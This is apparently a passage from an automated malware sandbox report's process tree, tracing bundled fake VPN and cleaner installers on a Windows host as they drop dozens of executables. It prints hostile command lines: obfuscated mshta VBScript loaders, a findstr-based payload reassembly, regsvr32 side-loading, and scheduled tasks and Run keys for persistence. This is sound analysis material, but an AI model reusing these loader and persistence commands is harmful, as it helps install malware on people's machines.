C:\Users\Admin\AppData\Local\Temp\is-0BVV6.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-0BVV6.tmp\vpn.tmp" /SL5="$70464,15170975,270336,C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=72010⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "11⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090112⤵
- Checks SCSI registry key(s)
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "11⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090112⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall11⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install11⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Cleaner_Installation.exe"C:\Users\Admin\AppData\Local\Temp\Cleaner_Installation.exe" SID=717 CID=717 SILENT=1 /quiet9⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\Cleaner_Installation.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630966744 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"10⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\askinstall45.exe"C:\Users\Admin\AppData\Local\Temp\askinstall45.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 172410⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\Cube_WW12.exe"C:\Users\Admin\AppData\Local\Temp\Cube_WW12.exe"9⤵
- Drops file in Drivers directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
C:\Users\Admin\Documents\TtBtseA7OwczTqQdOpgDhIF6.exe"C:\Users\Admin\Documents\TtBtseA7OwczTqQdOpgDhIF6.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 26011⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\u6O2lYuN45gldcYns6gwqtUW.exe"C:\Users\Admin\Documents\u6O2lYuN45gldcYns6gwqtUW.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3504 -s 24011⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\YCQmsiyzyTi0xuPxt02rhNMN.exe"C:\Users\Admin\Documents\YCQmsiyzyTi0xuPxt02rhNMN.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 680 -s 24011⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\DDwmV6HyIc64RE8o4uUmJpN4.exe"C:\Users\Admin\Documents\DDwmV6HyIc64RE8o4uUmJpN4.exe"10⤵
-
-
C:\Users\Admin\Documents\rc_oVbsjixICYFzOpZ0Ayh4U.exe"C:\Users\Admin\Documents\rc_oVbsjixICYFzOpZ0Ayh4U.exe"10⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\dllhost.exedllhost.exe11⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Nobile.docm11⤵
-
C:\Windows\SysWOW64\cmd.execmd12⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^mFzuIhvmvbdHpfegBQvdRBWtkZruqmiMQZvPfzkmbfdsclZwZBnIIvmXJgVJldnWdERlThYiFXSCkFJqZwimwmrxmnuwnBfiQxqRzPi$" Vederlo.docm13⤵
-
-
C:\Windows\SysWOW64\PING.EXEping localhost13⤵
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.comRimasta.exe.com J13⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com J14⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.comC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com J15⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RegAsm.exe16⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\Documents\V86dHJD8rbROs0_iUjVyYHhI.exe"C:\Users\Admin\Documents\V86dHJD8rbROs0_iUjVyYHhI.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 27611⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\F3CsAbnuCqjSQ8BZvimw5eDL.exe"C:\Users\Admin\Documents\F3CsAbnuCqjSQ8BZvimw5eDL.exe"10⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\F3CsAbnuCqjSQ8BZvimw5eDL.exe"C:\Users\Admin\Documents\F3CsAbnuCqjSQ8BZvimw5eDL.exe"11⤵
-
-
C:\Users\Admin\Documents\F3CsAbnuCqjSQ8BZvimw5eDL.exe"C:\Users\Admin\Documents\F3CsAbnuCqjSQ8BZvimw5eDL.exe"11⤵
-
-
-
C:\Users\Admin\Documents\tOd297XzNxxmd4R6KM4v18Yt.exe"C:\Users\Admin\Documents\tOd297XzNxxmd4R6KM4v18Yt.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5972 -s 184411⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\R3S6RhoHfunCMxR805nnU4kB.exe"C:\Users\Admin\Documents\R3S6RhoHfunCMxR805nnU4kB.exe"10⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\8iZitAPRBKMq3qrovRpmW12e.exe"C:\Users\Admin\Documents\8iZitAPRBKMq3qrovRpmW12e.exe"10⤵
-
C:\Users\Admin\Documents\8iZitAPRBKMq3qrovRpmW12e.exeC:\Users\Admin\Documents\8iZitAPRBKMq3qrovRpmW12e.exe11⤵
-
-
-
C:\Users\Admin\Documents\j9aPtnZmflsz2BIRSwcEYmjK.exe"C:\Users\Admin\Documents\j9aPtnZmflsz2BIRSwcEYmjK.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 28811⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\rT9tzzj2U3TDukAG3jyQdJvk.exe"C:\Users\Admin\Documents\rT9tzzj2U3TDukAG3jyQdJvk.exe"10⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST11⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST11⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"11⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\2NO4EGc6YPspQPWLYBDzlG_d.exe"C:\Users\Admin\Documents\2NO4EGc6YPspQPWLYBDzlG_d.exe"12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE ( creatEoBjECT ( "wScRiPt.shELl" ). RuN ("CMD /c TypE ""C:\Users\Admin\Documents\2NO4EGc6YPspQPWLYBDzlG_d.exe"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if """" =="""" for %B iN ( ""C:\Users\Admin\Documents\2NO4EGc6YPspQPWLYBDzlG_d.exe"" ) do taskkill /Im ""%~NxB"" /F " , 0 , tRUe ) )13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c TypE "C:\Users\Admin\Documents\2NO4EGc6YPspQPWLYBDzlG_d.exe"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "" =="" for %B iN ( "C:\Users\Admin\Documents\2NO4EGc6YPspQPWLYBDzlG_d.exe" ) do taskkill /Im "%~NxB" /F14⤵
-
C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXEGZ9~4QZ~O.EXe -P6_oIH__Ioj5q15⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE ( creatEoBjECT ( "wScRiPt.shELl" ). RuN ("CMD /c TypE ""C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if ""-P6_oIH__Ioj5q "" =="""" for %B iN ( ""C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"" ) do taskkill /Im ""%~NxB"" /F " , 0 , tRUe ) )16⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c TypE "C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "-P6_oIH__Ioj5q " =="" for %B iN ( "C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE" ) do taskkill /Im "%~NxB" /F17⤵
-
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" T~DJNB.F -u /S16⤵
- Drops file in Program Files directory
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /Im "2NO4EGc6YPspQPWLYBDzlG_d.exe" /F15⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Documents\tQmanFmMmw5Eppl7Lx89O5GP.exe"C:\Users\Admin\Documents\tQmanFmMmw5Eppl7Lx89O5GP.exe" /mixtwo12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 28413⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\pzgixrZsRiOmDekc2YqTWjJk.exe"C:\Users\Admin\Documents\pzgixrZsRiOmDekc2YqTWjJk.exe"12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6008 -s 28013⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\SQNZpr2VC0mlUmxdtXRM9jzG.exe"C:\Users\Admin\Documents\SQNZpr2VC0mlUmxdtXRM9jzG.exe"12⤵
-
C:\ProgramData\4415688.exe"C:\ProgramData\4415688.exe"13⤵
-
-
C:\ProgramData\2096572.exe"C:\ProgramData\2096572.exe"13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5832 -s 78014⤵
- Program crash
-
-
-
-
-
-
C:\Users\Admin\Documents\LxeNCoPgW_Bn8Y7xua1vs6LP.exe"C:\Users\Admin\Documents\LxeNCoPgW_Bn8Y7xua1vs6LP.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 440 -s 28011⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\uhBHgY4G6dHq7iRdR8mPlIcI.exe"C:\Users\Admin\Documents\uhBHgY4G6dHq7iRdR8mPlIcI.exe"10⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\uhBHgY4G6dHq7iRdR8mPlIcI.exe"C:\Users\Admin\Documents\uhBHgY4G6dHq7iRdR8mPlIcI.exe"11⤵
-
-
-
C:\Users\Admin\Documents\1sOcL2rt1eb4bwDJDSZS1B8x.exe"C:\Users\Admin\Documents\1sOcL2rt1eb4bwDJDSZS1B8x.exe"10⤵
-
-
C:\Users\Admin\Documents\5tmVkybe1njQOtxp5xHcOZlX.exe"C:\Users\Admin\Documents\5tmVkybe1njQOtxp5xHcOZlX.exe"10⤵
-
C:\Users\Admin\AppData\Local\Temp\{68A1A8B8-0BF2-45E9-B827-96C5B20A9FF9}\5tmVkybe1njQOtxp5xHcOZlX.exeC:\Users\Admin\AppData\Local\Temp\{68A1A8B8-0BF2-45E9-B827-96C5B20A9FF9}\5tmVkybe1njQOtxp5xHcOZlX.exe /q"C:\Users\Admin\Documents\5tmVkybe1njQOtxp5xHcOZlX.exe" /tempdisk1folder"C:\Users\Admin\AppData\Local\Temp\{68A1A8B8-0BF2-45E9-B827-96C5B20A9FF9}" /IS_temp11⤵
-
C:\Windows\SysWOW64\MSIEXEC.EXE"C:\Windows\system32\MSIEXEC.EXE" /i "C:\Users\Admin\AppData\Local\Downloaded Installations\{4175BAA6-49B9-43E5-8B49-E892979E209E}\menageudrivers.msi" SETUPEXEDIR="C:\Users\Admin\Documents" SETUPEXENAME="5tmVkybe1njQOtxp5xHcOZlX.exe"12⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\MSI6923.tmp"C:\Users\Admin\AppData\Local\Temp\MSI6923.tmp"13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\MSI6912.tmp"C:\Users\Admin\AppData\Local\Temp\MSI6912.tmp"13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\MSI68B4.tmp"C:\Users\Admin\AppData\Local\Temp\MSI68B4.tmp"13⤵
-
-
-
-
-
C:\Users\Admin\Documents\C53ZoKdeb0voW7FlXV8cbdWo.exe"C:\Users\Admin\Documents\C53ZoKdeb0voW7FlXV8cbdWo.exe"10⤵
-
C:\Users\Admin\Documents\C53ZoKdeb0voW7FlXV8cbdWo.exe"C:\Users\Admin\Documents\C53ZoKdeb0voW7FlXV8cbdWo.exe"11⤵
-
-
-
C:\Users\Admin\Documents\JNT5zuJ8IhIcZYSwCBPiK8xw.exe"C:\Users\Admin\Documents\JNT5zuJ8IhIcZYSwCBPiK8xw.exe"10⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
-
C:\Users\Admin\Documents\NO79QJfQZ0K4M8JxMSlowAfg.exe"C:\Users\Admin\Documents\NO79QJfQZ0K4M8JxMSlowAfg.exe"10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL"). Run ( "cmD.exe /Q /c TYPE ""C:\Users\Admin\Documents\NO79QJfQZ0K4M8JxMSlowAfg.exe"" > X4d4XArNWDu.eXE && StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if """" == """" for %A IN ( ""C:\Users\Admin\Documents\NO79QJfQZ0K4M8JxMSlowAfg.exe"" ) do taskkill /f -im ""%~nxA"" " , 0 , trUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\Documents\NO79QJfQZ0K4M8JxMSlowAfg.exe"> X4d4XArNWDu.eXE && StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if "" == "" for %A IN ( "C:\Users\Admin\Documents\NO79QJfQZ0K4M8JxMSlowAfg.exe" ) do taskkill /f -im "%~nxA"12⤵
-
C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXEX4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL"). Run ( "cmD.exe /Q /c TYPE ""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" > X4d4XArNWDu.eXE && StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if ""-PXPoqL0iOUHHP7hXFattB5ZvsV "" == """" for %A IN ( ""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" ) do taskkill /f -im ""%~nxA"" " , 0 , trUE ) )14⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"> X4d4XArNWDu.eXE && StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if "-PXPoqL0iOUHHP7hXFattB5ZvsV " == "" for %A IN ( "C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE" ) do taskkill /f -im "%~nxA"15⤵
-
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" -S fOUT6o7J.Mj14⤵
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -im "NO79QJfQZ0K4M8JxMSlowAfg.exe"13⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Documents\ItjtlIfiYXshRUpLIXScVnWt.exe"C:\Users\Admin\Documents\ItjtlIfiYXshRUpLIXScVnWt.exe"10⤵
-
-
C:\Users\Admin\Documents\E2nEEDUk4E440x1Pnra0pWhk.exe"C:\Users\Admin\Documents\E2nEEDUk4E440x1Pnra0pWhk.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 23611⤵
- Program crash
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\028d53f5224f9cc8c60bd953504f1efa.exe"C:\Users\Admin\AppData\Local\Temp\028d53f5224f9cc8c60bd953504f1efa.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1464 -s 23610⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\Cleanpro12.exe"C:\Users\Admin\AppData\Local\Temp\Cleanpro12.exe"9⤵
-
C:\Users\Admin\Documents\DB12jv_vlA5HEg2vwRDc8nAK.exe"C:\Users\Admin\Documents\DB12jv_vlA5HEg2vwRDc8nAK.exe"10⤵
-
-
C:\Users\Admin\Documents\76_y4wfW5NjE2viArhiocBK2.exe"C:\Users\Admin\Documents\76_y4wfW5NjE2viArhiocBK2.exe"10⤵
-
C:\Users\Admin\Documents\76_y4wfW5NjE2viArhiocBK2.exeC:\Users\Admin\Documents\76_y4wfW5NjE2viArhiocBK2.exe11⤵
-
-
-
C:\Users\Admin\Documents\U7H4WXVYKJo0epak7XoOtqBb.exe"C:\Users\Admin\Documents\U7H4WXVYKJo0epak7XoOtqBb.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6512 -s 23611⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\YrYpVLp5c1z9CoPSec5lvOwo.exe"C:\Users\Admin\Documents\YrYpVLp5c1z9CoPSec5lvOwo.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6460 -s 28011⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\ydrjEEg0FwtV4YSMIzGRaPsP.exe"C:\Users\Admin\Documents\ydrjEEg0FwtV4YSMIzGRaPsP.exe"10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL"). Run ( "cmD.exe /Q /c TYPE ""C:\Users\Admin\Documents\ydrjEEg0FwtV4YSMIzGRaPsP.exe"" > X4d4XArNWDu.eXE && StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if """" == """" for %A IN ( ""C:\Users\Admin\Documents\ydrjEEg0FwtV4YSMIzGRaPsP.exe"" ) do taskkill /f -im ""%~nxA"" " , 0 , trUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\Documents\ydrjEEg0FwtV4YSMIzGRaPsP.exe"> X4d4XArNWDu.eXE && StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if "" == "" for %A IN ( "C:\Users\Admin\Documents\ydrjEEg0FwtV4YSMIzGRaPsP.exe" ) do taskkill /f -im "%~nxA"12⤵
-
C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXEX4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL"). Run ( "cmD.exe /Q /c TYPE ""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" > X4d4XArNWDu.eXE && StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if ""-PXPoqL0iOUHHP7hXFattB5ZvsV "" == """" for %A IN ( ""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" ) do taskkill /f -im ""%~nxA"" " , 0 , trUE ) )14⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"> X4d4XArNWDu.eXE && StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if "-PXPoqL0iOUHHP7hXFattB5ZvsV " == "" for %A IN ( "C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE" ) do taskkill /f -im "%~nxA"15⤵
-
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" -S fOUT6o7J.Mj14⤵
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -im "ydrjEEg0FwtV4YSMIzGRaPsP.exe"13⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Documents\qHpxEwg9BT1d1YZlelihQwaX.exe"C:\Users\Admin\Documents\qHpxEwg9BT1d1YZlelihQwaX.exe"10⤵
-
-
C:\Users\Admin\Documents\vIfTySBrOLTswvC4ofpMqm_Y.exe"C:\Users\Admin\Documents\vIfTySBrOLTswvC4ofpMqm_Y.exe"10⤵
-
C:\Users\Admin\Documents\vIfTySBrOLTswvC4ofpMqm_Y.exe"C:\Users\Admin\Documents\vIfTySBrOLTswvC4ofpMqm_Y.exe"11⤵
-
-
C:\Users\Admin\Documents\vIfTySBrOLTswvC4ofpMqm_Y.exe"C:\Users\Admin\Documents\vIfTySBrOLTswvC4ofpMqm_Y.exe"11⤵
-
-
-
C:\Users\Admin\Documents\8dxCUYGbriuRJJ0Rkzyb9uHV.exe"C:\Users\Admin\Documents\8dxCUYGbriuRJJ0Rkzyb9uHV.exe"10⤵
-
C:\Users\Admin\Documents\8dxCUYGbriuRJJ0Rkzyb9uHV.exe"C:\Users\Admin\Documents\8dxCUYGbriuRJJ0Rkzyb9uHV.exe"11⤵
-
-
-
C:\Users\Admin\Documents\ABUTlLDYwdOpceNGgLirDdph.exe"C:\Users\Admin\Documents\ABUTlLDYwdOpceNGgLirDdph.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 28811⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\BAOehC05chOfSRyy2mKlIqKY.exe"C:\Users\Admin\Documents\BAOehC05chOfSRyy2mKlIqKY.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6396 -s 28411⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\5IEdNsGeboi9CSp3s5vdK5xs.exe"C:\Users\Admin\Documents\5IEdNsGeboi9CSp3s5vdK5xs.exe"10⤵
-
-
C:\Users\Admin\Documents\8YhT6QGRA2zbSRGg61LpYhHe.exe"C:\Users\Admin\Documents\8YhT6QGRA2zbSRGg61LpYhHe.exe"10⤵
-
-
C:\Users\Admin\Documents\Qm8iW3f6syqSy81XEBl8aoH_.exe"C:\Users\Admin\Documents\Qm8iW3f6syqSy81XEBl8aoH_.exe"10⤵
-
-
C:\Users\Admin\Documents\VLNSxuedafMsFEjyNEMqA04r.exe"C:\Users\Admin\Documents\VLNSxuedafMsFEjyNEMqA04r.exe"10⤵
-
C:\Users\Admin\Documents\VLNSxuedafMsFEjyNEMqA04r.exe"C:\Users\Admin\Documents\VLNSxuedafMsFEjyNEMqA04r.exe"11⤵
-
-
-
C:\Users\Admin\Documents\DZfRkUxAPRXK9Cyyk0SxvLx_.exe"C:\Users\Admin\Documents\DZfRkUxAPRXK9Cyyk0SxvLx_.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6340 -s 24011⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\hhEmTFEZpdyqqhZLOehnMhKX.exe"C:\Users\Admin\Documents\hhEmTFEZpdyqqhZLOehnMhKX.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6332 -s 24011⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\NEXMI0BXyeqE0untowRkxxBY.exe"C:\Users\Admin\Documents\NEXMI0BXyeqE0untowRkxxBY.exe"10⤵
-
-
C:\Users\Admin\Documents\xKm_xicKYT9RdDiLpf0NlDSf.exe"C:\Users\Admin\Documents\xKm_xicKYT9RdDiLpf0NlDSf.exe"10⤵
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"11⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\Documents\4ogfmBx2lNYnlxFLfGnvlOjz.exe"C:\Users\Admin\Documents\4ogfmBx2lNYnlxFLfGnvlOjz.exe"12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE ( creatEoBjECT ( "wScRiPt.shELl" ). RuN ("CMD /c TypE ""C:\Users\Admin\Documents\4ogfmBx2lNYnlxFLfGnvlOjz.exe"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if """" =="""" for %B iN ( ""C:\Users\Admin\Documents\4ogfmBx2lNYnlxFLfGnvlOjz.exe"" ) do taskkill /Im ""%~NxB"" /F " , 0 , tRUe ) )13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c TypE "C:\Users\Admin\Documents\4ogfmBx2lNYnlxFLfGnvlOjz.exe"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "" =="" for %B iN ( "C:\Users\Admin\Documents\4ogfmBx2lNYnlxFLfGnvlOjz.exe" ) do taskkill /Im "%~NxB" /F14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /Im "4ogfmBx2lNYnlxFLfGnvlOjz.exe" /F15⤵
- Kills process with taskkill
-
-
C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXEGZ9~4QZ~O.EXe -P6_oIH__Ioj5q15⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE ( creatEoBjECT ( "wScRiPt.shELl" ). RuN ("CMD /c TypE ""C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if ""-P6_oIH__Ioj5q "" =="""" for %B iN ( ""C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"" ) do taskkill /Im ""%~NxB"" /F " , 0 , tRUe ) )16⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c TypE "C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "-P6_oIH__Ioj5q " =="" for %B iN ( "C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE" ) do taskkill /Im "%~NxB" /F17⤵
-
-
-
